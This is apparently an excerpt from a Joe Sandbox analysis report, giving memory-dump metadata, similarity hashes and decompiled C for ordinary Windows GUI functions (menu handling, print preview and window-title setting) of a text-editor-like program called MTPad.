                                                                                                                                                                                                                                                                                          • Associated: 00000001.00000002.712110114.0000000000820000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000001.00000002.712110114.0000000000830000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000001.00000002.712946985.0000000000869000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000001.00000002.713011724.000000000086C000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000001.00000002.713140868.0000000000880000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000001.00000002.713182892.0000000000883000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_1_2_800000_pigalicapi.jbxd
                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                          • API ID: MessageSend$RectWindow_memset
                                                                                                                                                                                                                                                                                          • String ID: P
                                                                                                                                                                                                                                                                                          • API String ID: 1972968356-3110715001
                                                                                                                                                                                                                                                                                          • Opcode ID: a3f98a3802122371b70548c47017c2d2099b5a7703288af37a2f40196ddb7320
                                                                                                                                                                                                                                                                                          • Instruction ID: 44af53a6aca2628c08afc8c90be6973543915358d1352631bcb838a645fa8da5
                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: a3f98a3802122371b70548c47017c2d2099b5a7703288af37a2f40196ddb7320
                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 4D41FAB1E0030CABEB10DFA8DD85BEEBBB9EF44704F104119E605BB291DBB46A45CB55
                                                                                                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                          C-Code - Quality: 89%
                                                                                                                                                                                                                                                                                          			E0080E95B(void* __esi) {
                                                                                                                                                                                                                                                                                          				void* __ebx;
                                                                                                                                                                                                                                                                                          				intOrPtr* _t52;
                                                                                                                                                                                                                                                                                          				CHAR* _t53;
                                                                                                                                                                                                                                                                                          				intOrPtr _t57;
                                                                                                                                                                                                                                                                                          				int _t58;
                                                                                                                                                                                                                                                                                          				void* _t59;
                                                                                                                                                                                                                                                                                          				char _t65;
                                                                                                                                                                                                                                                                                          				struct HMENU__* _t68;
                                                                                                                                                                                                                                                                                          				void* _t69;
                                                                                                                                                                                                                                                                                          				signed short _t70;
                                                                                                                                                                                                                                                                                          				void* _t72;
                                                                                                                                                                                                                                                                                          				void* _t73;
                                                                                                                                                                                                                                                                                          				signed int _t74;
                                                                                                                                                                                                                                                                                          				void* _t76;
                                                                                                                                                                                                                                                                                          
                                                                                                                                                                                                                                                                                          				_t72 = __esi;
                                                                                                                                                                                                                                                                                          				do {
                                                                                                                                                                                                                                                                                          					_t68 =  *(_t74 - 0x15c);
                                                                                                                                                                                                                                                                                          					E00816820(_t74 - 0x190, 0, 0x30);
                                                                                                                                                                                                                                                                                          					 *(_t74 - 0x190) = 0x30;
                                                                                                                                                                                                                                                                                          					E00816820(_t74 - 0x13c, 0, 0x90);
                                                                                                                                                                                                                                                                                          					_t76 = _t76 + 0x18;
                                                                                                                                                                                                                                                                                          					_t67 = _t74 - 0x140;
                                                                                                                                                                                                                                                                                          					 *(_t74 - 0x140) = 0x94;
                                                                                                                                                                                                                                                                                          					if(GetVersionExA(_t74 - 0x140) == 0) {
                                                                                                                                                                                                                                                                                          						L6:
                                                                                                                                                                                                                                                                                          						 *(_t74 - 0x190) = 0x2c;
                                                                                                                                                                                                                                                                                          					} else {
                                                                                                                                                                                                                                                                                          						_t57 =  *((intOrPtr*)(_t74 - 0x13c));
                                                                                                                                                                                                                                                                                          						if(_t57 < 5 && (_t57 != 4 ||  *((intOrPtr*)(_t74 - 0x138)) < 0x5a)) {
                                                                                                                                                                                                                                                                                          							goto L6;
                                                                                                                                                                                                                                                                                          						}
                                                                                                                                                                                                                                                                                          					}
                                                                                                                                                                                                                                                                                          					 *((intOrPtr*)(_t74 - 0x168)) = 0x64;
                                                                                                                                                                                                                                                                                          					 *((intOrPtr*)(_t74 - 0x18c)) = 0x3f;
                                                                                                                                                                                                                                                                                          					 *((intOrPtr*)(_t74 - 0x16c)) = _t74 - 0x70;
                                                                                                                                                                                                                                                                                          					if(GetMenuItemInfoA(_t68, _t58, 1, _t74 - 0x190) == 0 || ( *(_t74 - 0x188) & 0x00000800) != 0) {
                                                                                                                                                                                                                                                                                          						goto L20;
                                                                                                                                                                                                                                                                                          					} else {
                                                                                                                                                                                                                                                                                          						_t52 =  *((intOrPtr*)(_t74 - 0x170));
                                                                                                                                                                                                                                                                                          						if(_t52 == 0 ||  *_t52 != 0x1313) {
                                                                                                                                                                                                                                                                                          							goto L20;
                                                                                                                                                                                                                                                                                          						} else {
                                                                                                                                                                                                                                                                                          							_t53 =  *(_t52 + 4);
                                                                                                                                                                                                                                                                                          							if(_t53 == 0) {
                                                                                                                                                                                                                                                                                          								goto L20;
                                                                                                                                                                                                                                                                                          							} else {
                                                                                                                                                                                                                                                                                          								_t65 =  *_t53;
                                                                                                                                                                                                                                                                                          								if(_t65 == 0) {
                                                                                                                                                                                                                                                                                          									goto L20;
                                                                                                                                                                                                                                                                                          								} else {
                                                                                                                                                                                                                                                                                          									while(_t65 != 0x26) {
                                                                                                                                                                                                                                                                                          										_t53 = CharNextA(_t53);
                                                                                                                                                                                                                                                                                          										_t65 =  *_t53;
                                                                                                                                                                                                                                                                                          										if(_t65 != 0) {
                                                                                                                                                                                                                                                                                          											continue;
                                                                                                                                                                                                                                                                                          										} else {
                                                                                                                                                                                                                                                                                          											goto L20;
                                                                                                                                                                                                                                                                                          										}
                                                                                                                                                                                                                                                                                          										goto L23;
                                                                                                                                                                                                                                                                                          									}
                                                                                                                                                                                                                                                                                          									if( *_t53 == 0) {
                                                                                                                                                                                                                                                                                          										goto L20;
                                                                                                                                                                                                                                                                                          									} else {
                                                                                                                                                                                                                                                                                          										_t67 = _t53[1];
                                                                                                                                                                                                                                                                                          										 *((intOrPtr*)(_t74 - 0x160)) = CharLowerA( *(_t74 + 8) & 0x0000ffff);
                                                                                                                                                                                                                                                                                          										if(CharLowerA(_t53[1] & 0x0000ffff) !=  *((intOrPtr*)(_t74 - 0x160))) {
                                                                                                                                                                                                                                                                                          											goto L20;
                                                                                                                                                                                                                                                                                          										} else {
                                                                                                                                                                                                                                                                                          											if( *((char*)(_t74 - 0x141)) != 0) {
                                                                                                                                                                                                                                                                                          												 *(_t74 - 0x148) = 3;
                                                                                                                                                                                                                                                                                          											} else {
                                                                                                                                                                                                                                                                                          												_t67 = _t58 & 0x0000ffff;
                                                                                                                                                                                                                                                                                          												 *(_t74 - 0x150) = _t58 & 0x0000ffff;
                                                                                                                                                                                                                                                                                          												 *((char*)(_t74 - 0x141)) = 1;
                                                                                                                                                                                                                                                                                          												goto L20;
                                                                                                                                                                                                                                                                                          											}
                                                                                                                                                                                                                                                                                          										}
                                                                                                                                                                                                                                                                                          									}
                                                                                                                                                                                                                                                                                          								}
                                                                                                                                                                                                                                                                                          							}
                                                                                                                                                                                                                                                                                          						}
                                                                                                                                                                                                                                                                                          					}
                                                                                                                                                                                                                                                                                          					L23:
                                                                                                                                                                                                                                                                                          					if( *((char*)(_t74 - 0x141)) != 0) {
                                                                                                                                                                                                                                                                                          						_t70 =  *(_t74 - 0x148);
                                                                                                                                                                                                                                                                                          						if(_t70 == 2) {
                                                                                                                                                                                                                                                                                          							PostMessageA( *(_t72 + 4), 0x448, 0xffffffff, 0);
                                                                                                                                                                                                                                                                                          							E00811570(_t72, _t70);
                                                                                                                                                                                                                                                                                          						}
                                                                                                                                                                                                                                                                                          						_t67 =  *(_t74 - 0x150) & 0x0000ffff;
                                                                                                                                                                                                                                                                                          						 *( *(_t74 - 0x158)) = 1;
                                                                                                                                                                                                                                                                                          						 *(_t74 - 0x14c) = (_t70 & 0x0000ffff) << 0x00000010 |  *(_t74 - 0x150) & 0x0000ffff;
                                                                                                                                                                                                                                                                                          					}
                                                                                                                                                                                                                                                                                          					_pop(_t69);
                                                                                                                                                                                                                                                                                          					_pop(_t73);
                                                                                                                                                                                                                                                                                          					_pop(_t59);
                                                                                                                                                                                                                                                                                          					return E008159E6( *(_t74 - 0x14c), _t59,  *(_t74 - 4) ^ _t74, _t67, _t69, _t73);
                                                                                                                                                                                                                                                                                          					L20:
                                                                                                                                                                                                                                                                                          					_t58 = _t58 + 1;
                                                                                                                                                                                                                                                                                          				} while (_t58 <  *((intOrPtr*)(_t74 - 0x154)));
                                                                                                                                                                                                                                                                                          				goto L23;
                                                                                                                                                                                                                                                                                          			}

















                                                                                                                                                                                                                                                                                          0x0080e95b
                                                                                                                                                                                                                                                                                          0x0080e960
                                                                                                                                                                                                                                                                                          0x0080e960
                                                                                                                                                                                                                                                                                          0x0080e971
                                                                                                                                                                                                                                                                                          0x0080e987
                                                                                                                                                                                                                                                                                          0x0080e991
                                                                                                                                                                                                                                                                                          0x0080e996
                                                                                                                                                                                                                                                                                          0x0080e999
                                                                                                                                                                                                                                                                                          0x0080e9a0
                                                                                                                                                                                                                                                                                          0x0080e9b2
                                                                                                                                                                                                                                                                                          0x0080e9cd
                                                                                                                                                                                                                                                                                          0x0080e9cd
                                                                                                                                                                                                                                                                                          0x0080e9b4
                                                                                                                                                                                                                                                                                          0x0080e9b4
                                                                                                                                                                                                                                                                                          0x0080e9bd
                                                                                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                                                                                          0x0080e9bd
                                                                                                                                                                                                                                                                                          0x0080e9e5
                                                                                                                                                                                                                                                                                          0x0080e9ef
                                                                                                                                                                                                                                                                                          0x0080e9f9
                                                                                                                                                                                                                                                                                          0x0080ea07
                                                                                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                                                                                          0x0080ea19
                                                                                                                                                                                                                                                                                          0x0080ea19
                                                                                                                                                                                                                                                                                          0x0080ea21
                                                                                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                                                                                          0x0080ea2b
                                                                                                                                                                                                                                                                                          0x0080ea2b
                                                                                                                                                                                                                                                                                          0x0080ea30
                                                                                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                                                                                          0x0080ea32
                                                                                                                                                                                                                                                                                          0x0080ea32
                                                                                                                                                                                                                                                                                          0x0080ea36
                                                                                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                                                                                          0x0080ea38
                                                                                                                                                                                                                                                                                          0x0080ea38
                                                                                                                                                                                                                                                                                          0x0080ea3e
                                                                                                                                                                                                                                                                                          0x0080ea44
                                                                                                                                                                                                                                                                                          0x0080ea48
                                                                                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                                                                                          0x0080ea4a
                                                                                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                                                                                          0x0080ea4a
                                                                                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                                                                                          0x0080ea48
                                                                                                                                                                                                                                                                                          0x0080ea4f
                                                                                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                                                                                          0x0080ea51
                                                                                                                                                                                                                                                                                          0x0080ea51
                                                                                                                                                                                                                                                                                          0x0080ea67
                                                                                                                                                                                                                                                                                          0x0080ea79
                                                                                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                                                                                          0x0080ea7b
                                                                                                                                                                                                                                                                                          0x0080ea82
                                                                                                                                                                                                                                                                                          0x0080eaa3
                                                                                                                                                                                                                                                                                          0x0080ea84
                                                                                                                                                                                                                                                                                          0x0080ea84
                                                                                                                                                                                                                                                                                          0x0080ea87
                                                                                                                                                                                                                                                                                          0x0080ea8d
                                                                                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                                                                                          0x0080ea8d
                                                                                                                                                                                                                                                                                          0x0080ea82
                                                                                                                                                                                                                                                                                          0x0080ea79
                                                                                                                                                                                                                                                                                          0x0080ea4f
                                                                                                                                                                                                                                                                                          0x0080ea36
                                                                                                                                                                                                                                                                                          0x0080ea30
                                                                                                                                                                                                                                                                                          0x0080ea21
                                                                                                                                                                                                                                                                                          0x0080eaad
                                                                                                                                                                                                                                                                                          0x0080eab4
                                                                                                                                                                                                                                                                                          0x0080eaba
                                                                                                                                                                                                                                                                                          0x0080eac3
                                                                                                                                                                                                                                                                                          0x0080ead2
                                                                                                                                                                                                                                                                                          0x0080eada
                                                                                                                                                                                                                                                                                          0x0080eada
                                                                                                                                                                                                                                                                                          0x0080eadf
                                                                                                                                                                                                                                                                                          0x0080eaf4
                                                                                                                                                                                                                                                                                          0x0080eafa
                                                                                                                                                                                                                                                                                          0x0080eafa
                                                                                                                                                                                                                                                                                          0x0080ec83
                                                                                                                                                                                                                                                                                          0x0080ec84
                                                                                                                                                                                                                                                                                          0x0080ec87
                                                                                                                                                                                                                                                                                          0x0080ec90
                                                                                                                                                                                                                                                                                          0x0080ea94
                                                                                                                                                                                                                                                                                          0x0080ea94
                                                                                                                                                                                                                                                                                          0x0080ea95
                                                                                                                                                                                                                                                                                          0x00000000

                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                          • Source File: 00000001.00000002.711552533.0000000000801000.00000020.00000001.01000000.00000006.sdmp, Offset: 00800000, based on PE: true
                                                                                                                                                                                                                                                                                          • Associated: 00000001.00000002.711459674.0000000000800000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000001.00000002.712110114.0000000000820000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000001.00000002.712110114.0000000000830000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000001.00000002.712946985.0000000000869000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000001.00000002.713011724.000000000086C000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000001.00000002.713140868.0000000000880000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000001.00000002.713182892.0000000000883000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_1_2_800000_pigalicapi.jbxd
                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                          • API ID: Message$Send$CharPost$Lower_memset$BeepClientEnabledInfoItemMenuNextRectVersionWindow
                                                                                                                                                                                                                                                                                          • String ID: ,$?$Z$d
                                                                                                                                                                                                                                                                                          • API String ID: 735944419-3748737801
                                                                                                                                                                                                                                                                                          • Opcode ID: 44a6a42f2c7c569f25cda2fa2febded14606262745d2d6e7befc1037105dabc5
                                                                                                                                                                                                                                                                                          • Instruction ID: b449dafe94241c0c9f5dd7467a63ef6ad1c173ce6606c9268e8fc7d70b7b2270
                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 44a6a42f2c7c569f25cda2fa2febded14606262745d2d6e7befc1037105dabc5
                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 21319A70A002289BEBB0CB24CC89BEABBB5FF19714F1448D9E149E62D1D7719E81CF51
                                                                                                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                          C-Code - Quality: 96%
                                                                                                                                                                                                                                                                                          			E008093A0(struct HWND__* __edx, intOrPtr __edi, void* __eflags) {
                                                                                                                                                                                                                                                                                          				signed int _v8;
                                                                                                                                                                                                                                                                                          				struct tagRECT _v24;
                                                                                                                                                                                                                                                                                          				struct HWND__* _v28;
                                                                                                                                                                                                                                                                                          				void* __ebx;
                                                                                                                                                                                                                                                                                          				void* __esi;
                                                                                                                                                                                                                                                                                          				signed int _t36;
                                                                                                                                                                                                                                                                                          				intOrPtr _t39;
                                                                                                                                                                                                                                                                                          				void* _t62;
                                                                                                                                                                                                                                                                                          				intOrPtr _t66;
                                                                                                                                                                                                                                                                                          				intOrPtr _t79;
                                                                                                                                                                                                                                                                                          				void* _t85;
                                                                                                                                                                                                                                                                                          				intOrPtr _t86;
                                                                                                                                                                                                                                                                                          				signed int _t91;
                                                                                                                                                                                                                                                                                          
                                                                                                                                                                                                                                                                                          				_t84 = __edi;
                                                                                                                                                                                                                                                                                          				_t78 = __edx;
                                                                                                                                                                                                                                                                                          				_t36 =  *0x869060; // 0xda7e2511
                                                                                                                                                                                                                                                                                          				_v8 = _t36 ^ _t91;
                                                                                                                                                                                                                                                                                          				if(E00808E40(__edx, __edi) != 0) {
                                                                                                                                                                                                                                                                                          					__eflags = __edi;
                                                                                                                                                                                                                                                                                          					if(__edi == 0) {
                                                                                                                                                                                                                                                                                          						_t86 = 0;
                                                                                                                                                                                                                                                                                          						__eflags = 0;
                                                                                                                                                                                                                                                                                          					} else {
                                                                                                                                                                                                                                                                                          						_t86 = __edi + 0x34;
                                                                                                                                                                                                                                                                                          					}
                                                                                                                                                                                                                                                                                          					_t39 =  *((intOrPtr*)(_t84 + 0x530));
                                                                                                                                                                                                                                                                                          					_t66 =  *((intOrPtr*)(_t84 + 0x4b8));
                                                                                                                                                                                                                                                                                          					_t79 =  *((intOrPtr*)(_t84 + 0x4c0));
                                                                                                                                                                                                                                                                                          					__eflags =  *((intOrPtr*)(_t84 + 0x4ec));
                                                                                                                                                                                                                                                                                          					if( *((intOrPtr*)(_t84 + 0x4ec)) != 0) {
                                                                                                                                                                                                                                                                                          						 *((intOrPtr*)(_t84 + 0x4ec)) = 0;
                                                                                                                                                                                                                                                                                          					}
                                                                                                                                                                                                                                                                                          					 *((intOrPtr*)(_t84 + 0x4ec)) = _t66;
                                                                                                                                                                                                                                                                                          					 *((intOrPtr*)(_t84 + 0x4e8)) = _t86;
                                                                                                                                                                                                                                                                                          					 *((intOrPtr*)(_t84 + 0x4f4)) = _t79;
                                                                                                                                                                                                                                                                                          					 *((intOrPtr*)(_t84 + 0x504)) = 0;
                                                                                                                                                                                                                                                                                          					 *((intOrPtr*)(_t84 + 0x4f8)) = 0;
                                                                                                                                                                                                                                                                                          					 *((intOrPtr*)(_t84 + 0x508)) = 0;
                                                                                                                                                                                                                                                                                          					 *((intOrPtr*)(_t84 + 0x50c)) = _t39 - 1;
                                                                                                                                                                                                                                                                                          					E008066C0(0, _t84 + 0x4e8);
                                                                                                                                                                                                                                                                                          					GetClientRect( *(_t84 + 4),  &_v24);
                                                                                                                                                                                                                                                                                          					_v28 =  *(_t84 + 4);
                                                                                                                                                                                                                                                                                          					__eflags =  *0x86add0; // 0x0
                                                                                                                                                                                                                                                                                          					if(__eflags == 0) {
                                                                                                                                                                                                                                                                                          						 *0x86add0 = 0;
                                                                                                                                                                                                                                                                                          					}
                                                                                                                                                                                                                                                                                          					E00813ED0(_t84 + 0x4c4, E00813FF0(0x86ada0, 0x880c04, _t84 + 0x4e4) & 0x0000ffff, _v28,  &_v24, 0, 0x56000000, 0, 0);
                                                                                                                                                                                                                                                                                          					ShowWindow( *(_t84 + 0x4c8), 5);
                                                                                                                                                                                                                                                                                          					SetWindowPos( *(_t84 + 0x4c8), 0, 0, 0, 0, 0, 0x43);
                                                                                                                                                                                                                                                                                          					ShowWindow( *(_t84 + 0x2c), 0);
                                                                                                                                                                                                                                                                                          					 *(_t84 + 0x524) =  *(_t84 + 0x2c);
                                                                                                                                                                                                                                                                                          					 *(_t84 + 0x2c) =  *(_t84 + 0x4c8);
                                                                                                                                                                                                                                                                                          					SendMessageA( *(_t84 + 0x24), 0x423, 1, 0);
                                                                                                                                                                                                                                                                                          					SendMessageA( *(_t84 + 0x24), 0x423, 2, 1);
                                                                                                                                                                                                                                                                                          					E0080A7D0(E00813FF0(0x86ada0, 0x880c04, _t84 + 0x4e4) & 0x0000ffff, _t84, __eflags, 1);
                                                                                                                                                                                                                                                                                          					__eflags = 0;
                                                                                                                                                                                                                                                                                          					return E008159E6(0, E00813FF0(0x86ada0, 0x880c04, _t84 + 0x4e4) & 0x0000ffff, _v8 ^ _t91,  *(_t84 + 0x4c8), _t84, SendMessageA);
                                                                                                                                                                                                                                                                                          				} else {
                                                                                                                                                                                                                                                                                          					MessageBoxA( *(__edi + 4), "Print preview operation failed", "MTPad", 0x10);
                                                                                                                                                                                                                                                                                          					return E008159E6(0, _t62, _v8 ^ _t91, _t78, __edi, _t85);
                                                                                                                                                                                                                                                                                          				}
                                                                                                                                                                                                                                                                                          			}
















                                                                                                                                                                                                                                                                                          0x008093a0
                                                                                                                                                                                                                                                                                          0x008093a0
                                                                                                                                                                                                                                                                                          0x008093a6
                                                                                                                                                                                                                                                                                          0x008093ad
                                                                                                                                                                                                                                                                                          0x008093ba
                                                                                                                                                                                                                                                                                          0x008093e6
                                                                                                                                                                                                                                                                                          0x008093e8
                                                                                                                                                                                                                                                                                          0x008093ef
                                                                                                                                                                                                                                                                                          0x008093ef
                                                                                                                                                                                                                                                                                          0x008093ea
                                                                                                                                                                                                                                                                                          0x008093ea
                                                                                                                                                                                                                                                                                          0x008093ea
                                                                                                                                                                                                                                                                                          0x008093f1
                                                                                                                                                                                                                                                                                          0x008093f7
                                                                                                                                                                                                                                                                                          0x008093fd
                                                                                                                                                                                                                                                                                          0x00809403
                                                                                                                                                                                                                                                                                          0x00809409
                                                                                                                                                                                                                                                                                          0x0080940b
                                                                                                                                                                                                                                                                                          0x0080940b
                                                                                                                                                                                                                                                                                          0x00809411
                                                                                                                                                                                                                                                                                          0x00809417
                                                                                                                                                                                                                                                                                          0x0080941d
                                                                                                                                                                                                                                                                                          0x00809423
                                                                                                                                                                                                                                                                                          0x00809429
                                                                                                                                                                                                                                                                                          0x00809438
                                                                                                                                                                                                                                                                                          0x0080943e
                                                                                                                                                                                                                                                                                          0x00809444
                                                                                                                                                                                                                                                                                          0x00809451
                                                                                                                                                                                                                                                                                          0x0080945c
                                                                                                                                                                                                                                                                                          0x0080945f
                                                                                                                                                                                                                                                                                          0x00809465
                                                                                                                                                                                                                                                                                          0x00809467
                                                                                                                                                                                                                                                                                          0x00809467
                                                                                                                                                                                                                                                                                          0x008094a1
                                                                                                                                                                                                                                                                                          0x008094b5
                                                                                                                                                                                                                                                                                          0x008094ca
                                                                                                                                                                                                                                                                                          0x008094d6
                                                                                                                                                                                                                                                                                          0x008094f4
                                                                                                                                                                                                                                                                                          0x008094fa
                                                                                                                                                                                                                                                                                          0x008094fd
                                                                                                                                                                                                                                                                                          0x0080950c
                                                                                                                                                                                                                                                                                          0x00809512
                                                                                                                                                                                                                                                                                          0x0080951d
                                                                                                                                                                                                                                                                                          0x00809528
                                                                                                                                                                                                                                                                                          0x008093bc
                                                                                                                                                                                                                                                                                          0x008093cc
                                                                                                                                                                                                                                                                                          0x008093e3
                                                                                                                                                                                                                                                                                          0x008093e3

                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                          • MessageBoxA.USER32 ref: 008093CC
                                                                                                                                                                                                                                                                                          • GetClientRect.USER32 ref: 00809451
                                                                                                                                                                                                                                                                                          • ShowWindow.USER32(?,00000005,?,?,00000000,56000000,00000000,00000000,?,?), ref: 008094B5
                                                                                                                                                                                                                                                                                          • SetWindowPos.USER32(?,00000000,00000000,00000000,00000000,00000000,00000043,?,?), ref: 008094CA
                                                                                                                                                                                                                                                                                          • ShowWindow.USER32(?,00000000,?,?), ref: 008094D6
                                                                                                                                                                                                                                                                                          • SendMessageA.USER32 ref: 008094FD
                                                                                                                                                                                                                                                                                          • SendMessageA.USER32 ref: 0080950C
                                                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                          • Source File: 00000001.00000002.711552533.0000000000801000.00000020.00000001.01000000.00000006.sdmp, Offset: 00800000, based on PE: true
                                                                                                                                                                                                                                                                                          • Associated: 00000001.00000002.711459674.0000000000800000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000001.00000002.712110114.0000000000820000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000001.00000002.712110114.0000000000830000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000001.00000002.712946985.0000000000869000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000001.00000002.713011724.000000000086C000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000001.00000002.713140868.0000000000880000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000001.00000002.713182892.0000000000883000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_1_2_800000_pigalicapi.jbxd
                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                          • API ID: MessageWindow$SendShow$ClientRect
                                                                                                                                                                                                                                                                                          • String ID: MTPad$Print preview operation failed
                                                                                                                                                                                                                                                                                          • API String ID: 3447962482-1460434131
                                                                                                                                                                                                                                                                                          • Opcode ID: 305c9169e574a0970c510e22cbce4e294b7c954129833bb0274dd8015008dd4a
                                                                                                                                                                                                                                                                                          • Instruction ID: 1fa7a79ab48589ffb8df022b1dc0bb6194f30ff51fb60a1b56b50260cc21c045
                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 305c9169e574a0970c510e22cbce4e294b7c954129833bb0274dd8015008dd4a
                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 62415FB1B00A06BBD758DF64DC85FAAF7A9FB48701F00421AE61997281DB70B950CFD5
                                                                                                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                          C-Code - Quality: 90%
                                                                                                                                                                                                                                                                                          			E00808160(void* __edi) {
                                                                                                                                                                                                                                                                                          				signed int _v8;
                                                                                                                                                                                                                                                                                          				char _v264;
                                                                                                                                                                                                                                                                                          				int _v268;
                                                                                                                                                                                                                                                                                          				void* _v276;
                                                                                                                                                                                                                                                                                          				void* __ebx;
                                                                                                                                                                                                                                                                                          				void* __esi;
                                                                                                                                                                                                                                                                                          				signed int _t14;
                                                                                                                                                                                                                                                                                          				CHAR* _t30;
                                                                                                                                                                                                                                                                                          				void* _t31;
                                                                                                                                                                                                                                                                                          				void* _t38;
                                                                                                                                                                                                                                                                                          				CHAR* _t40;
                                                                                                                                                                                                                                                                                          				signed int _t41;
                                                                                                                                                                                                                                                                                          				CHAR* _t42;
                                                                                                                                                                                                                                                                                          
                                                                                                                                                                                                                                                                                          				_t38 = __edi;
                                                                                                                                                                                                                                                                                          				_t14 =  *0x869060; // 0xda7e2511
                                                                                                                                                                                                                                                                                          				_v8 = _t14 ^ _t41;
                                                                                                                                                                                                                                                                                          				_t30 = __edi + 0x3ac;
                                                                                                                                                                                                                                                                                          				_v268 = lstrlenA(_t30);
                                                                                                                                                                                                                                                                                          				LoadStringA( *0x880c0c, 0x80,  &_v264, 0xff);
                                                                                                                                                                                                                                                                                          				E0081ACA0(lstrlenA( &_v264) + _v268 + 5);
                                                                                                                                                                                                                                                                                          				_t40 = _t42;
                                                                                                                                                                                                                                                                                          				lstrcpyA(_t40, _t30);
                                                                                                                                                                                                                                                                                          				_t31 = lstrcatA;
                                                                                                                                                                                                                                                                                          				if( *((intOrPtr*)(__edi + 0x4b4)) != 0) {
                                                                                                                                                                                                                                                                                          					lstrcatA(_t40, "*");
                                                                                                                                                                                                                                                                                          				}
                                                                                                                                                                                                                                                                                          				lstrcatA(_t40, " - ");
                                                                                                                                                                                                                                                                                          				lstrcatA(_t40,  &_v264);
                                                                                                                                                                                                                                                                                          				SetWindowTextA( *(_t38 + 4), _t40);
                                                                                                                                                                                                                                                                                          				return E008159E6(0, _t31, _v8 ^ _t41,  &_v264, _t38, _t40);
                                                                                                                                                                                                                                                                                          			}
















                                                                                                                                                                                                                                                                                          0x00808160
                                                                                                                                                                                                                                                                                          0x00808169
                                                                                                                                                                                                                                                                                          0x00808170
                                                                                                                                                                                                                                                                                          0x0080817b
                                                                                                                                                                                                                                                                                          0x0080818f
                                                                                                                                                                                                                                                                                          0x008081a2
                                                                                                                                                                                                                                                                                          0x008081bb
                                                                                                                                                                                                                                                                                          0x008081c0
                                                                                                                                                                                                                                                                                          0x008081c4
                                                                                                                                                                                                                                                                                          0x008081d1
                                                                                                                                                                                                                                                                                          0x008081d7
                                                                                                                                                                                                                                                                                          0x008081df
                                                                                                                                                                                                                                                                                          0x008081df
                                                                                                                                                                                                                                                                                          0x008081e7
                                                                                                                                                                                                                                                                                          0x008081f1
                                                                                                                                                                                                                                                                                          0x008081f8
                                                                                                                                                                                                                                                                                          0x00808215

                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                          • Source File: 00000001.00000002.711552533.0000000000801000.00000020.00000001.01000000.00000006.sdmp, Offset: 00800000, based on PE: true
                                                                                                                                                                                                                                                                                          • Associated: 00000001.00000002.711459674.0000000000800000.00000002.00000001.01000000.00000006.sdmpDownload File
